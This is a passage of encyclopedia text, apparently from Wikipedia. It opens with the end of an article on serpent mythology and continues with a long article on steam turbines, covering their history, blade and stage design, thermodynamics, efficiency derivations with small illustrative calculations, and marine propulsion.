looked at her to stone and who was slain by the hero Perseus. In the Roman poet Ovid's Metamorphoses, Medusa is said to have once been a beautiful priestess of Athena, whom Athena turned into a serpent-haired monster after she was raped by the god Poseidon in Athena's temple. In another myth, referenced by the Boeotian poet Hesiod and described in detail by Pseudo-Apollodorus, the hero Heracles is said to have slain the Lernaean Hydra, a multiple-headed serpent which dwelt in the swamps of Lerna. The legendary account of the foundation of Thebes mentions a monster snake guarding the spring from which the new settlement was to draw its water. In fighting and killing the snake, the companions of the founder Cadmus all perished—leading to the term "Cadmean victory" (i.e. a victory involving one's own ruin). Three medical symbols involving snakes are still used today: the Bowl of Hygieia, symbolizing pharmacy, and the Caduceus and Rod of Asclepius, which denote medicine in general. One of the etymologies proposed for the common female first name Linda is that it might derive from Old German Lindi or Linda, meaning a serpent. India is often called the land of snakes and is steeped in tradition regarding snakes.
Snakes are worshipped as gods even today, with many women pouring milk on snake pits (despite snakes' aversion to milk). The cobra is seen on the neck of Shiva, and Vishnu is often depicted sleeping on a seven-headed snake or within the coils of a serpent. There are also several temples in India devoted solely to cobras, sometimes called Nagraj (King of Snakes), and it is believed that snakes are symbols of fertility. Each year, on the Hindu festival of Nag Panchami, snakes are venerated and prayed to.
Biology and health sciences
Reptiles
null
29374
https://en.wikipedia.org/wiki/Steam%20turbine
Steam turbine
A steam turbine or steam turbine engine is a machine or heat engine that extracts thermal energy from pressurized steam and uses it to do mechanical work on a rotating output shaft. Its modern manifestation was invented by Charles Parsons in 1884. Fabrication of a modern steam turbine involves advanced metalwork to form high-grade steel alloys into precision parts using technologies that first became available in the 20th century; continued advances in the durability and efficiency of steam turbines remain central to the energy economics of the 21st century. The steam turbine is a form of heat engine that derives much of its improvement in thermodynamic efficiency from the use of multiple stages in the expansion of the steam, which results in a closer approach to the ideal reversible expansion process. Because the turbine generates rotary motion, it can be coupled to a generator to harness its motion into electricity. Such turbogenerators are the core of thermal power stations, which can be fueled by fossil fuels, nuclear fuels, geothermal, or solar energy. About 42% of all electricity generation in the United States in 2022 was by the use of steam turbines. Technical challenges include rotor imbalance, vibration, bearing wear, and uneven expansion (various forms of thermal shock). In large installations, even the sturdiest turbine will shake itself apart if operated out of trim. History The first device that may be classified as a reaction steam turbine was little more than a toy, the classic aeolipile, described in the 1st century by Hero of Alexandria in Roman Egypt. In 1551, Taqi al-Din in Ottoman Egypt described a steam turbine with the practical application of rotating a spit. Steam turbines were also described by the Italian Giovanni Branca (1629) and John Wilkins in England (1648). The devices described by Taqi al-Din and Wilkins are today known as steam jacks. In 1672, an impulse-turbine-driven small toy car was designed by Ferdinand Verbiest. A more modern version of this car was produced some time in the late 18th century by an unknown German mechanic. In 1775, at Soho, James Watt designed a reaction turbine that was put to work there. In 1807, Polikarp Zalesov designed and constructed an impulse turbine, using it for fire pump operation. In 1827 the Frenchmen Real and Pichon patented and constructed a compound impulse turbine. The modern steam turbine was invented in 1884 by Charles Parsons, whose first model was connected to a dynamo that generated 7.5 kilowatts (10 hp) of electricity. The invention of Parsons' steam turbine made cheap and plentiful electricity possible and revolutionized marine transport and naval warfare. Parsons' design was a reaction type. His patent was licensed and the turbine scaled up shortly after by an American, George Westinghouse. The Parsons turbine also turned out to be easy to scale up. Parsons had the satisfaction of seeing his invention adopted for all major world power stations, and the size of generators had increased from his first 7.5-kilowatt set up to units of 50,000 kilowatts capacity. Within Parsons' lifetime, the generating capacity of a unit was scaled up by about 10,000 times, and the total output from turbo-generators constructed by his firm C. A. Parsons and Company and by their licensees, for land purposes alone, had exceeded thirty million horse-power. Other variations of turbines have been developed that work effectively with steam. The de Laval turbine (invented by Gustaf de Laval) accelerated the steam to full speed before running it against a turbine blade.
De Laval's impulse turbine is simpler and less expensive and does not need to be pressure-proof. It can operate with any pressure of steam, but is considerably less efficient. Auguste Rateau developed a pressure-compounded impulse turbine using the de Laval principle as early as 1896, obtained a US patent in 1903, and applied the turbine to a French torpedo boat in 1904. He taught at the École des mines de Saint-Étienne for a decade until 1897, and later founded a successful company that was incorporated into the Alstom firm after his death. One of the founders of the modern theory of steam and gas turbines was Aurel Stodola, a Slovak physicist and engineer and professor at the Swiss Polytechnical Institute (now ETH) in Zurich. His work Die Dampfturbinen und ihre Aussichten als Wärmekraftmaschinen (English: The Steam Turbine and its prospective use as a Heat Engine) was published in Berlin in 1903. A further book, Dampf- und Gas-Turbinen (English: Steam and Gas Turbines), was published in 1922. The Brown-Curtis turbine, an impulse type, which had been originally developed and patented by the U.S. company International Curtis Marine Turbine Company, was developed in the 1900s in conjunction with John Brown & Company. It was used in John Brown-engined merchant ships and warships, including liners and Royal Navy warships. Manufacturing The present-day manufacturing industry for steam turbines includes the following companies: WEG (Brazil) Harbin Electric, Shanghai Electric, Dongfang Electric (China) Doosan Škoda Power (Czech Republic – South Korea) Alstom (France) Siemens Energy, BTT-Bremer Turbinentechnik GmbH, K&K Turboservice GmbH (Germany) BHEL, Larsen & Toubro, Triveni Engineering & Industries (India) MAPNA (Iran) Ansaldo (Italy) Mitsubishi, KHI, Toshiba, IHI (Japan) Silmash, Ural TW, KTZ, Energomash-Atomenergo, Power Machines, Leningradsky Metallichesky Zavod (Russia) Turboatom (Ukraine) EDF (France) Curtiss-Wright, Elliot Company, GE Vernova, Skinner Power Systems, Baker Hughes, Leonardo DRS, Chart Industries, Northrop Grumman Marine Systems (United States) Trillium Flow Technologies (United Kingdom) EMS Power Machines (Turkey) Types Steam turbines are made in a variety of sizes, ranging from small <0.75 kW (<1 hp) units (rare) used as mechanical drives for pumps, compressors and other shaft-driven equipment, to large turbines used to generate electricity. There are several classifications for modern steam turbines. Blade and stage design Turbine blades are of two basic types, blades and nozzles. Blades move entirely due to the impact of steam on them and their profiles do not converge. This results in a steam velocity drop and essentially no pressure drop as steam moves through the blades. A turbine composed of blades alternating with fixed nozzles is called an impulse turbine, Curtis turbine, Rateau turbine, or Brown-Curtis turbine. Nozzles appear similar to blades, but their profiles converge near the exit. This results in a steam pressure drop and velocity increase as steam moves through the nozzles. Nozzles move due to both the impact of steam on them and the reaction due to the high-velocity steam at the exit. A turbine composed of moving nozzles alternating with fixed nozzles is called a reaction turbine or Parsons turbine. Except for low-power applications, turbine blades are arranged in multiple stages in series, called compounding, which greatly improves efficiency at low speeds. A reaction stage is a row of fixed nozzles followed by a row of moving nozzles. Multiple reaction stages divide the pressure drop between the steam inlet and exhaust into numerous small drops, resulting in a pressure-compounded turbine.
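There is a simple quantitative rationale for compounding. As a hedged aside (this is the standard textbook idealization for frictionless, equiangular impulse blading, not a result stated in this text), the blade-speed ratio that maximizes blade efficiency falls as moving rows are added, so a velocity-compounded wheel can run much slower than a simple stage supplied with steam of the same velocity:

```latex
% Optimum blade-speed ratio for an ideal impulse stage with n moving rows
% (n = 1: simple stage; n >= 2: the velocity-compounded "Curtis wheels"
% described below), alpha_1 being the nozzle angle from the plane of rotation.
\rho_{\mathrm{opt}} = \frac{U}{V_1} = \frac{\cos\alpha_1}{2n},
\qquad
\eta_{b,\max} = \cos^{2}\alpha_1 \quad (n = 1).
```

With n = 2 the optimum blade speed is halved for the same steam velocity, which is one reason Curtis wheels were favored at the high-pressure, high-velocity front end of a turbine, as described next.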
Impulse stages may be either pressure-compounded, velocity-compounded, or pressure-velocity compounded. A pressure-compounded impulse stage is a row of fixed nozzles followed by a row of moving blades, with multiple such stages for compounding. This is also known as a Rateau turbine, after its inventor. A velocity-compounded impulse stage (invented by Curtis and also called a "Curtis wheel") is a row of fixed nozzles followed by two or more rows of moving blades alternating with rows of fixed blades. This divides the velocity drop across the stage into several smaller drops. A series of velocity-compounded impulse stages is called a pressure-velocity compounded turbine. By 1905, when steam turbines were coming into use on fast ships and in land-based power applications, it had been determined that it was desirable to use one or more Curtis wheels at the beginning of a multi-stage turbine (where the steam pressure is highest), followed by reaction stages. This was more efficient with high-pressure steam due to reduced leakage between the turbine rotor and the casing. The German 1905 AEG marine steam turbine illustrates this arrangement: steam from the boilers enters at high pressure through a throttle, controlled manually by an operator (in this case a sailor known as the throttleman). It passes through five Curtis wheels and numerous reaction stages (small blades at the edges of two large rotors) before exiting at low pressure, almost certainly to a condenser. The condenser provides a vacuum that maximizes the energy extracted from the steam, and condenses the steam into feedwater to be returned to the boilers. Several additional reaction stages, on two large rotors, rotate the turbine in reverse for astern operation, with steam admitted by a separate throttle. Since ships are rarely operated in reverse, efficiency is not a priority in astern turbines, so only a few stages are used to save cost. Blade design challenges A major challenge facing turbine design was reducing the creep experienced by the blades. Because of the high temperatures and high stresses of operation, steam turbine materials become damaged through these mechanisms. As temperatures are increased in an effort to improve turbine efficiency, creep becomes significant. To limit creep, thermal coatings and superalloys with solid-solution strengthening and grain boundary strengthening are used in blade designs. Protective coatings are used to reduce the thermal damage and to limit oxidation. These coatings are often stabilized zirconium dioxide-based ceramics. Using a thermal protective coating limits the temperature exposure of the nickel superalloy. This reduces the creep mechanisms experienced in the blade. Oxidation coatings limit efficiency losses caused by a buildup on the outside of the blades, which is especially important in the high-temperature environment. The nickel-based blades are alloyed with aluminum and titanium to improve strength and creep resistance. The microstructure of these alloys is composed of different regions of composition. A uniform dispersion of the gamma-prime phase – a combination of nickel, aluminum, and titanium – promotes the strength and creep resistance of the blade. Refractory elements such as rhenium and ruthenium can be added to the alloy to improve creep strength.
The addition of these elements reduces the diffusion of the gamma prime phase, thus preserving the fatigue resistance, strength, and creep resistance. Steam supply and exhaust conditions Turbine types include condensing, non-condensing, reheat, extracting and induction. Condensing turbines Condensing turbines are most commonly found in electrical power plants. These turbines receive steam from a boiler and exhaust it to a condenser. The exhausted steam is at a pressure well below atmospheric, and is in a partially condensed state, typically of a quality near 90%. Non-condensing turbines Non-condensing turbines are most widely used for process steam applications, in which the steam will be used for additional purposes after being exhausted from the turbine. The exhaust pressure is controlled by a regulating valve to suit the needs of the process steam pressure. These are commonly found at refineries, district heating units, pulp and paper plants, and desalination facilities where large amounts of low-pressure process steam are needed. Reheat turbines Reheat turbines are also used almost exclusively in electrical power plants. In a reheat turbine, steam flow exits from a high-pressure section of the turbine and is returned to the boiler, where additional superheat is added. The steam then goes back into an intermediate-pressure section of the turbine and continues its expansion. Using reheat in a cycle increases the work output from the turbine and also ensures that the expansion is complete before the steam condenses, thereby minimizing erosion of the blades in the last rows. In most cases, the maximum number of reheats employed in a cycle is two, as the cost of superheating the steam negates the increase in the work output from the turbine. Extracting turbines Extracting type turbines are common in all applications. In an extracting type turbine, steam is released from various stages of the turbine and used for industrial process needs or sent to boiler feedwater heaters to improve overall cycle efficiency. Extraction flows may be controlled with a valve, or left uncontrolled. Extracted steam results in a loss of power in the downstream stages of the turbine. Induction turbines introduce low-pressure steam at an intermediate stage to produce additional power. Casing or shaft arrangements These arrangements include single casing, tandem compound and cross compound turbines. Single casing units are the most basic style, where a single casing and shaft are coupled to a generator. Tandem compound is used where two or more casings are directly coupled together to drive a single generator. A cross compound turbine arrangement features two or more shafts not in line driving two or more generators that often operate at different speeds. A cross compound turbine is typically used for many large applications. A typical 1930s–1960s naval installation is illustrated below; this shows high- and low-pressure turbines driving a common reduction gear, with a geared cruising turbine on one high-pressure turbine. Two-flow rotors The moving steam imparts both a tangential and axial thrust on the turbine shaft, but the axial thrust in a simple turbine is unopposed. To maintain the correct rotor position and balancing, this force must be counteracted by an opposing force. Thrust bearings can be used for the shaft bearings, the rotor can use dummy pistons, it can be double-flow (the steam enters in the middle of the shaft and exits at both ends), or a combination of any of these.
In a double flow rotor, the blades in each half face opposite ways, so that the axial forces negate each other but the tangential forces act together. This design of rotor is also called two-flow, double-axial-flow, or double-exhaust. This arrangement is common in low-pressure casings of a compound turbine. Principle of operation and design An ideal steam turbine is considered to be an isentropic process, or constant entropy process, in which the entropy of the steam entering the turbine is equal to the entropy of the steam leaving the turbine. No steam turbine is truly isentropic, however, with typical isentropic efficiencies ranging from 20 to 90% based on the application of the turbine. The interior of a turbine comprises several sets of blades or buckets. One set of stationary blades is connected to the casing and one set of rotating blades is connected to the shaft. The sets intermesh with certain minimum clearances, with the size and configuration of sets varying to efficiently exploit the expansion of steam at each stage. Impulse turbines An impulse turbine has fixed nozzles that orient the steam flow into high-speed jets. These jets contain significant kinetic energy, which is converted into shaft rotation by the bucket-like shaped rotor blades, as the steam jet changes direction. A pressure drop occurs across only the stationary blades, with a net increase in steam velocity across the stage. As the steam flows through the nozzle its pressure falls from inlet pressure to the exit pressure (atmospheric pressure or, more usually, the condenser vacuum). Due to this high ratio of expansion of steam, the steam leaves the nozzle with a very high velocity. The steam leaving the moving blades retains a large portion of the maximum velocity it had when leaving the nozzle. The loss of energy due to this higher exit velocity is commonly called the carry-over velocity or leaving loss. The law of moment of momentum states that the sum of the moments of external forces acting on a fluid which is temporarily occupying the control volume is equal to the net time change of angular momentum flux through the control volume. The swirling fluid enters the control volume at radius $r_1$ with tangential velocity $V_{w1}$ and leaves at radius $r_2$ with tangential velocity $V_{w2}$. A velocity triangle paves the way for a better understanding of the relationship between the various velocities. In the adjacent figure we have: $V_1$ and $V_2$ are the absolute velocities at the inlet and outlet respectively. $V_{f1}$ and $V_{f2}$ are the flow velocities at the inlet and outlet respectively. $V_{w1}$ and $V_{w2}$ are the swirl velocities at the inlet and outlet respectively, in the moving reference. $V_{r1}$ and $V_{r2}$ are the relative velocities at the inlet and outlet respectively. $U$ is the velocity of the blade. $\alpha$ is the guide vane angle and $\beta$ is the blade angle. Then by the law of moment of momentum, the torque on the fluid is given by: $T = \dot{m}\left(r_1 V_{w1} - r_2 V_{w2}\right)$. For an impulse steam turbine: $r_1 = r_2 = r$. Therefore, the tangential force on the blades is $F_u = \dot{m}\left(V_{w1} - V_{w2}\right)$. The work done per unit time or power developed: $W = T\omega$. When $\omega$ is the angular velocity of the turbine, the blade speed is $U = \omega r$, and the power developed is then $W = \dot{m} U \left(V_{w1} - V_{w2}\right) = \dot{m} U \, \Delta V_w$.
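As a worked example of the force and power relations just derived (all numbers are assumed for illustration; the expansion of $\Delta V_w$ in terms of the friction coefficient $k$ and angle ratio $c$ is derived in the next section):

```python
from math import cos, radians

# Single impulse stage, using the notation above; all inputs are
# assumed, illustrative values.
m_dot = 10.0           # kg/s, steam mass flow
V1 = 600.0             # m/s, absolute velocity leaving the nozzles
U = 250.0              # m/s, blade speed
alpha1 = radians(20)   # guide vane (nozzle) angle
k, c = 0.9, 1.0        # blade friction coefficient; c = 1 for equiangular blades

dVw = (V1 * cos(alpha1) - U) * (1 + k * c)  # change in swirl velocity, m/s
F_u = m_dot * dVw                           # tangential force on the blades, N
P = m_dot * U * dVw                         # power developed, W
print(f"F_u = {F_u:.0f} N, P = {P/1e3:.0f} kW")   # ~5960 N, ~1490 kW
```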
Blade efficiency Blade efficiency ($\eta_b$) can be defined as the ratio of the work done on the blades to the kinetic energy supplied to the fluid, and is given by $\eta_b = \frac{U \Delta V_w}{\frac{1}{2}V_1^2} = \frac{2\, U \Delta V_w}{V_1^2}$. Stage efficiency A stage of an impulse turbine consists of a nozzle set and a moving wheel. The stage efficiency defines a relationship between the enthalpy drop in the nozzle and the work done in the stage: $\eta_{stage} = \frac{U \Delta V_w}{\Delta h}$, where $\Delta h = h_1 - h_2$ is the specific enthalpy drop of steam in the nozzle. By the first law of thermodynamics applied across the nozzle: $h_1 + \frac{1}{2}V_0^2 = h_2 + \frac{1}{2}V_1^2$, where $V_0$ is the velocity of steam entering the nozzle. Assuming that $V_0$ is appreciably less than $V_1$, we get $\Delta h \approx \frac{1}{2}V_1^2$. Furthermore, stage efficiency is the product of blade efficiency and nozzle efficiency, or $\eta_{stage} = \eta_b \, \eta_N$. Nozzle efficiency is given by $\eta_N = \frac{V_1^2}{2\left(h_1 - h_2\right)}$, where the enthalpy (in J/kg) of steam at the entrance of the nozzle is $h_1$ and the enthalpy of steam at the exit of the nozzle is $h_2$. The ratio of the cosines of the blade angles at the outlet and inlet can be taken and denoted $c = \frac{\cos\beta_2}{\cos\beta_1}$. The ratio of steam velocities relative to the rotor speed at the outlet to the inlet of the blade is defined by the friction coefficient $k = \frac{V_{r2}}{V_{r1}}$; $k < 1$ and depicts the loss in the relative velocity due to friction as the steam flows around the blades ($k = 1$ for smooth blades). From the velocity triangles, the change in swirl velocity can be written $\Delta V_w = \left(V_1\cos\alpha_1 - U\right)\left(1 + kc\right)$. The ratio of the blade speed to the absolute steam velocity at the inlet is termed the blade speed ratio, $\rho = \frac{U}{V_1}$, so that $\eta_b = 2\rho\left(\cos\alpha_1 - \rho\right)\left(1 + kc\right)$. $\eta_b$ is maximum when $\frac{d\eta_b}{d\rho} = 0$, or $\frac{d}{d\rho}\left[2\rho\left(\cos\alpha_1 - \rho\right)\left(1 + kc\right)\right] = 0$. That implies $\cos\alpha_1 - 2\rho = 0$ and therefore $\rho = \frac{\cos\alpha_1}{2}$ (for a single-stage impulse turbine). Therefore, the maximum value of stage efficiency is obtained by putting this value of $\rho$ in the expression of $\eta_b$. We get: $\eta_{b,max} = \frac{\cos^2\alpha_1}{2}\left(1 + kc\right)$. For equiangular blades, $\beta_1 = \beta_2$, therefore $c = 1$, and we get $\eta_{b,max} = \frac{\cos^2\alpha_1}{2}\left(1 + k\right)$. If the friction due to the blade surface is neglected then $k = 1$ and $\eta_{b,max} = \cos^2\alpha_1$. Conclusions on maximum efficiency For a given steam velocity, the work done per kg of steam would be maximum when $\cos^2\alpha_1 = 1$, i.e. when $\alpha_1 = 0$. As $\alpha_1$ increases, the work done on the blades reduces, but at the same time the surface area of the blade reduces, so there are less frictional losses.
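The optimum blade speed ratio can also be checked numerically; a minimal sketch, assuming equiangular frictionless blades ($k = c = 1$) and a 20° guide vane angle:

```python
from math import cos, radians

alpha1 = radians(20)
k, c = 1.0, 1.0

def eta_b(rho):
    # Blade efficiency of a single impulse stage, as derived above.
    return 2.0 * rho * (cos(alpha1) - rho) * (1.0 + k * c)

best = max((i / 10000.0 for i in range(10001)), key=eta_b)
print(f"optimum rho = {best:.4f}  (theory: {cos(alpha1) / 2:.4f})")
print(f"max eta_b   = {eta_b(best):.4f}  (theory: {cos(alpha1) ** 2:.4f})")
```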
Reaction turbines In the reaction turbine, the rotor blades themselves are arranged to form convergent nozzles. This type of turbine makes use of the reaction force produced as the steam accelerates through the nozzles formed by the rotor. Steam is directed onto the rotor by the fixed vanes of the stator. It leaves the stator as a jet that fills the entire circumference of the rotor. The steam then changes direction and increases its speed relative to the speed of the blades. A pressure drop occurs across both the stator and the rotor, with steam accelerating through the stator and decelerating through the rotor, with no net change in steam velocity across the stage but with a decrease in both pressure and temperature, reflecting the work performed in the driving of the rotor. Blade efficiency Energy input to the blades in a stage, $E$, is equal to the kinetic energy supplied to the fixed blades (f) plus the kinetic energy supplied to the moving blades (m). Or: $E$ = enthalpy drop over the fixed blades, $\Delta h_f$, plus the enthalpy drop over the moving blades, $\Delta h_m$. The effect of the expansion of steam over the moving blades is to increase the relative velocity at the exit. Therefore, the relative velocity at the exit, $V_{r2}$, is always greater than the relative velocity at the inlet, $V_{r1}$. In terms of velocities, the enthalpy drop over the moving blades is given by $\Delta h_m = \frac{V_{r2}^2 - V_{r1}^2}{2}$ (it contributes to a change in static pressure). The enthalpy drop in the fixed blades, with the assumption that the velocity of steam entering the fixed blades is equal to the velocity of steam leaving the previously moving blades, is given by $\Delta h_f = \frac{V_1^2 - V_0^2}{2}$, where $V_0$, the inlet velocity of steam in the nozzle, is very small and hence can be neglected. Therefore, $\Delta h_f = \frac{V_1^2}{2}$. A very widely used design has half degree of reaction or 50% reaction, and this is known as Parson's turbine. This consists of symmetrical rotor and stator blades. For this turbine the velocity triangle is similar and we have: $\alpha_1 = \beta_2$, $\beta_1 = \alpha_2$, $V_1 = V_{r2}$, $V_2 = V_{r1}$. Assuming Parson's turbine and substituting all the expressions, we get $E = V_1^2 - \frac{V_{r1}^2}{2}$. From the inlet velocity triangle we have $V_{r1}^2 = V_1^2 + U^2 - 2 U V_1 \cos\alpha_1$, so $E = \frac{V_1^2 - U^2 + 2 U V_1 \cos\alpha_1}{2}$. Work done (for unit mass flow per second): $W = U \, \Delta V_w = U\left(2 V_1 \cos\alpha_1 - U\right)$. Therefore, the blade efficiency is given by $\eta_b = \frac{2U\left(2V_1\cos\alpha_1 - U\right)}{V_1^2 - U^2 + 2UV_1\cos\alpha_1}$. Condition of maximum blade efficiency If $\rho = \frac{U}{V_1}$, then $\eta_b = \frac{2\rho\left(2\cos\alpha_1 - \rho\right)}{1 + 2\rho\cos\alpha_1 - \rho^2}$. For maximum efficiency $\frac{d\eta_b}{d\rho} = 0$, we get $\left(1 + 2\rho\cos\alpha_1 - \rho^2\right)\left(4\cos\alpha_1 - 4\rho\right) - 2\rho\left(2\cos\alpha_1 - \rho\right)\left(2\cos\alpha_1 - 2\rho\right) = 0$, which simplifies to $\cos\alpha_1 - \rho = 0$ and finally gives $\rho = \cos\alpha_1$. Therefore, the maximum blade efficiency is found by putting $\rho = \cos\alpha_1$ in the expression for blade efficiency: $\eta_{b,max} = \frac{2\cos^2\alpha_1}{1 + \cos^2\alpha_1}$. Operation and maintenance Steam turbines and their casings have a high thermal inertia due to the high pressures used in steam circuits and the materials used. When warming up a set for use, the main steam stop valves (after the boiler) have a bypass line to allow superheated steam to slowly bypass the valve and proceed to heat up the lines in the system along with the steam turbine. In addition, when there is no steam, a turning gear is engaged to slowly rotate the turbine to ensure even heating and prevent uneven expansion. After first rotating the turbine by the turning gear, allowing time for the rotor to assume a straight plane (no bowing), the turning gear is disengaged and steam is admitted to the turbine, first to the astern blades then to the ahead blades, slowly rotating the turbine at 10–15 RPM (0.17–0.25 Hz) to slowly warm the turbine. The warm-up procedure for large steam turbines may exceed ten hours. During normal operation, rotor imbalance can lead to vibration, which, because of the high rotation velocities, could lead to a blade breaking away from the rotor and through the casing. To mitigate this risk, significant efforts are made to balance the turbine. Also, turbines are run with high-quality steam: either superheated (dry) steam, or saturated steam with a high dryness fraction. This prevents the rapid impingement and erosion of the blades which occurs when condensed water is blasted onto the blades (moisture carry-over). Also, liquid water entering the blades may damage the thrust bearings for the turbine shaft. To prevent this, along with controls and baffles in the boilers to ensure high-quality steam, condensate drains are installed in the steam piping leading to the turbine. Maintenance requirements of modern steam turbines are simple and incur low costs (typically around $0.005 per kWh); their operational life often exceeds 50 years. Speed regulation The control of a turbine with a governor is essential, as turbines need to be run up slowly to prevent damage and some applications (such as the generation of alternating current electricity) require precise speed control. Uncontrolled acceleration of the turbine rotor can lead to an overspeed trip, which causes the governor and throttle valves that control the flow of steam to the turbine to close. If these valves fail then the turbine may continue accelerating until it breaks apart, often catastrophically. Turbines are expensive to make, requiring precision manufacture and special quality materials. During normal operation in synchronization with the electricity network, power plants are governed with a five percent droop speed control. This means the full load speed is 100% and the no-load speed is 105%. This is required for the stable operation of the network without hunting and drop-outs of power plants. Normally the changes in speed are minor.
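A minimal sketch of the five percent droop relationship just described, assuming a 50 Hz system and an arbitrary 500 MW rating (both assumptions, for illustration):

```python
def droop_output(freq_hz, p_rated_mw, f_nominal=50.0, droop=0.05):
    """Steady-state output under droop control: no-load speed is 105%,
    full-load speed is 100%, and load varies linearly in between."""
    f_no_load = f_nominal * (1.0 + droop)            # 52.5 Hz here
    load = (f_no_load - freq_hz) / (f_nominal * droop)
    return p_rated_mw * min(max(load, 0.0), 1.0)     # clamp to 0..rated

print(droop_output(52.50, 500.0))   # 0.0   -> no load
print(droop_output(51.25, 500.0))   # 250.0 -> half load
print(droop_output(50.00, 500.0))   # 500.0 -> full load
```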
Adjustments in power output are made by slowly raising the droop curve by increasing the spring pressure on a centrifugal governor. Generally this is a basic system requirement for all power plants, because the older and newer plants have to be compatible in response to the instantaneous changes in frequency without depending on outside communication. Thermodynamics of steam turbines The steam turbine operates on basic principles of thermodynamics using the part 3-4 of the Rankine cycle shown in the adjoining diagram. Superheated steam (or dry saturated steam, depending on application) leaves the boiler at high temperature and high pressure. At entry to the turbine, the steam gains kinetic energy by passing through a nozzle (a fixed nozzle in an impulse type turbine or the fixed blades in a reaction type turbine). When the steam leaves the nozzle it is moving at high velocity towards the blades of the turbine rotor. A force is created on the blades due to the pressure of the vapor on the blades, causing them to move. A generator or other such device can be placed on the shaft, and the energy that was in the steam can now be stored and used. The steam leaves the turbine as a saturated vapor (or liquid-vapor mix, depending on application) at a lower temperature and pressure than it entered with, and is sent to the condenser to be cooled. The first law enables us to find a formula for the rate at which work is developed per unit mass. Assuming there is no heat transfer to the surrounding environment and that the changes in kinetic and potential energy are negligible compared to the change in specific enthalpy, we arrive at the following equation: $\frac{\dot{W}}{\dot{m}} = h_3 - h_4$, where $\dot{W}$ is the rate at which work is developed per unit time and $\dot{m}$ is the rate of mass flow through the turbine. Isentropic efficiency To measure how well a turbine is performing we can look at its isentropic efficiency. This compares the actual performance of the turbine with the performance that would be achieved by an ideal, isentropic, turbine. When calculating this efficiency, heat lost to the surroundings is assumed to be zero. Steam's starting pressure and temperature are the same for both the actual and the ideal turbines, but at turbine exit, steam's energy content ('specific enthalpy') for the actual turbine is greater than that for the ideal turbine because of irreversibility in the actual turbine. The specific enthalpy is evaluated at the same steam pressure for the actual and ideal turbines in order to give a good comparison between the two. The isentropic efficiency is found by dividing the actual work by the ideal work: $\eta_t = \frac{h_3 - h_4}{h_3 - h_{4s}}$, where $h_3$ is the specific enthalpy at state three, $h_4$ is the specific enthalpy at state 4 for the actual turbine, and $h_{4s}$ is the specific enthalpy at state 4s for the isentropic turbine (but note that the adjacent diagram does not show state 4s: it is vertically below state 3).
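A short worked example of this definition, with assumed enthalpies in kJ/kg (illustrative numbers, not from the article):

```python
# State 3 = turbine inlet, 4 = actual exit, 4s = ideal (isentropic) exit.
h3, h4, h4s = 3350.0, 2550.0, 2450.0   # kJ/kg, assumed for illustration

w_actual = h3 - h4        # actual specific work output, kJ/kg
w_ideal = h3 - h4s        # ideal (isentropic) specific work, kJ/kg
eta = w_actual / w_ideal
print(f"w = {w_actual:.0f} kJ/kg, isentropic efficiency = {eta:.1%}")  # 88.9%
```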
Direct drive Electrical power stations use large steam turbines driving electric generators to produce most (about 80%) of the world's electricity. The advent of large steam turbines made central-station electricity generation practical, since reciprocating steam engines of large rating became very bulky and operated at slow speeds. Most central stations are fossil fuel power plants and nuclear power plants; some installations use geothermal steam, or use concentrated solar power (CSP) to create the steam. Steam turbines can also be used directly to drive large centrifugal pumps, such as feedwater pumps at a thermal power plant. The turbines used for electric power generation are most often directly coupled to their generators. As the generators must rotate at constant synchronous speeds according to the frequency of the electric power system, the most common speeds are 3,000 RPM for 50 Hz systems, and 3,600 RPM for 60 Hz systems. Since nuclear reactors have lower temperature limits than fossil-fired plants, with lower steam quality, the turbine generator sets may be arranged to operate at half these speeds, but with four-pole generators, to reduce erosion of turbine blades.
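These speeds follow from the standard synchronous-speed relation N = 120f/p (a textbook formula, not quoted in the article):

```python
def sync_rpm(freq_hz: float, poles: int) -> float:
    """Synchronous speed in rpm for a generator with the given pole count."""
    return 120.0 * freq_hz / poles

for f in (50, 60):
    print(f"{f} Hz: 2-pole {sync_rpm(f, 2):.0f} rpm, 4-pole {sync_rpm(f, 4):.0f} rpm")
# 50 Hz: 3000 or 1500 rpm; 60 Hz: 3600 or 1800 rpm. The four-pole figures
# match the half-speed arrangement described for nuclear sets above.
```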
Marine propulsion In steamships, advantages of steam turbines over reciprocating engines are smaller size, lower maintenance, lighter weight, and lower vibration. A steam turbine is efficient only when operating in the thousands of RPM, while the most effective propeller designs are for speeds less than 300 RPM; consequently, precise (thus expensive) reduction gears are usually required, although numerous early ships through World War I, such as Turbinia, had direct drive from the steam turbines to the propeller shafts. Another alternative is turbo-electric transmission, in which an electrical generator run by the high-speed turbine is used to run one or more slow-speed electric motors connected to the propeller shafts; this avoids the need for precision gear cutting, which may be a production bottleneck during wartime. Turbo-electric drive was most used in large US warships designed during World War I and in some fast liners, and was used in some troop transports and mass-production destroyer escorts in World War II. The higher cost of turbines and the associated gears or generator/motor sets is offset by lower maintenance requirements and the smaller size of a turbine in comparison with a reciprocating engine of equal power, although the fuel costs are higher than those of a diesel engine because steam turbines have lower thermal efficiency. To reduce fuel costs, the thermal efficiency of both types of engine have been improved over the years. Early development The development of steam turbine marine propulsion from 1894 to 1935 was dominated by the need to reconcile the high efficient speed of the turbine with the low efficient speed (less than 300 rpm) of the ship's propeller at an overall cost competitive with reciprocating engines. In 1894, efficient reduction gears were not available for the high powers required by ships, so direct drive was necessary. In Turbinia, which has direct drive to each propeller shaft, the efficient speed of the turbine was reduced after initial trials by directing the steam flow through all three direct drive turbines (one on each shaft) in series, probably totaling around 200 turbine stages operating in series. Also, there were three propellers on each shaft for operation at high speeds. The high shaft speeds of the era are represented by one of the first US turbine-powered destroyers, , launched in 1909, which had direct drive turbines and whose three shafts turned at 724 rpm. The use of turbines in several casings exhausting steam to each other in series became standard in most subsequent marine propulsion applications, and is a form of cross-compounding. The first turbine was called the high pressure (HP) turbine, the last turbine was the low pressure (LP) turbine, and any turbine in between was an intermediate pressure (IP) turbine. A much later arrangement than Turbinia can be seen on the preserved liner in Long Beach, California, launched in 1934, in which each shaft is powered by four turbines in series connected to the ends of the two input shafts of a single-reduction gearbox. They are the HP, 1st IP, 2nd IP, and LP turbines. Cruising machinery and gearing The quest for economy was even more important when cruising speeds were considered. Cruising speed is roughly 50% of a warship's maximum speed and requires only 20–25% of its maximum power. This would be a speed used on long voyages when fuel economy is desired. Although this brought the propeller speeds down to an efficient range, turbine efficiency was greatly reduced, and early turbine ships had poor cruising ranges. A solution that proved useful through most of the steam turbine propulsion era was the cruising turbine. This was an extra turbine to add even more stages, at first attached directly to one or more shafts, exhausting to a stage partway along the HP turbine, and not used at high speeds. As reduction gears became available around 1911, some ships, notably the battleship , had them on cruising turbines while retaining direct drive main turbines. Reduction gears allowed turbines to operate in their 